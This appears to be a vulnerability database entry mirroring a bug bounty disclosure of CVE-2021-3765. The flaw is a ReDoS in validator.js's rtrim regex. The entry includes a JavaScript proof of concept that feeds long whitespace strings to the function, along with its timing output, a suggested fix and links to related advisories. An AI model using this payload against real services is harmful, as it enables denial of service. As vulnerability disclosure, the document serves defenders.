Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrYetingliC37E975C-21A3-4C5F-9B57-04D63B28CFC9
HistorySep 21, 2021 - 8:41 a.m.

Inefficient Regular Expression Complexity in validatorjs/validator.js

2021-09-2108:41:23
yetingli
www.huntr.dev
21
vulnerability
denial of service
regular expression complexity
validator.js
redos
regex
rtrim
proof of concept
reference
bugbounty

EPSS

0.001

Percentile

46.0%

JSON

Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows cause a denial of service when calling function ‘rtrim’.

The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'a'+' '.repeat(i*10000)+"a";
    validator.rtrim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"

Reference

I have opened an issue before, but it is still not safe after fix.

For repair, you can refer to the rtrim function in package trim

Related

prion 1
osv 3
github 1
cvelist 1
veracode 1
ubuntucve 1
redhatcve 1
cve 1
nvd 1
debiancve 1
ibm 9
redhat 2
prion
prion
Design/Logic Flaw
2021-11-02 07:15:00
osv
osv
Inefficient Regular Expression Complexity in Validator.js
2021-11-19 20:14:23
Inefficient Regular Expression Complexity in validator.js
2021-11-03 17:34:45
CVE-2021-3765
2021-11-02 07:15:07
github
github
Inefficient Regular Expression Complexity in validator.js
2021-11-03 17:34:45
cvelist
cvelist
CVE-2021-3765 Inefficient Regular Expression Complexity in validatorjs/validator.js
2021-11-02 07:05:10
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2021-11-03 02:16:05
ubuntucve
ubuntucve
CVE-2021-3765
2021-11-02 00:00:00
redhatcve
redhatcve
CVE-2021-3765
2022-09-13 09:13:24
cve
cve
CVE-2021-3765
2021-11-02 07:15:07
nvd
nvd
CVE-2021-3765
2021-11-02 07:15:07
debiancve
debiancve
CVE-2021-3765
2021-11-02 07:15:00
ibm
ibm
Security Bulletin: Validator as used by IBM QRadar Assistant app for IBM QRadar SIEM is vulnerable to denial of service (CVE-2021-3765)
2023-04-04 19:45:41
Security Bulletin: QRadar Pulse application add on to IBM QRadar SIEM is vulnerable to using components with known vulnerabilities
2022-10-18 13:51:38
Security Bulletin: IBM Cloud Transformation Advisor is vulnerable to multiple vulnerabilities
2022-12-05 19:00:57
redhat
redhat
(RHSA-2023:7820) Moderate: Red Hat OpenShift Data Foundation 4.12.10 Bug Fix Update
2023-12-14 06:06:38
(RHSA-2023:3742) Important: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update
2023-06-21 15:20:50

EPSS

0.001

Percentile

46.0%

JSON
Related for C37E975C-21A3-4C5F-9B57-04D63B28CFC9
prion1osv3github1cvelist1veracode1ubuntucve1redhatcve1cve1nvd1debiancve1ibm9redhat2